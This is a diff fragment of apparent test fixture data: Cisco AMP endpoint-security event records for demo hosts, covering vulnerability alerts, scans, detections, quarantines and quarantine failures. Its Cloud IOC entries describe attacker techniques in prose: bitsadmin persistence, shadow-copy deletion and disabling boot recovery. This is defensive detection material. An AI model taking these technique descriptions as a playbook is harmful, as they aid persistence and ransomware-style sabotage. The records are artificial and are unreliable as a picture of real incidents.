Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 
Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 
Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. 
This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. 
This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
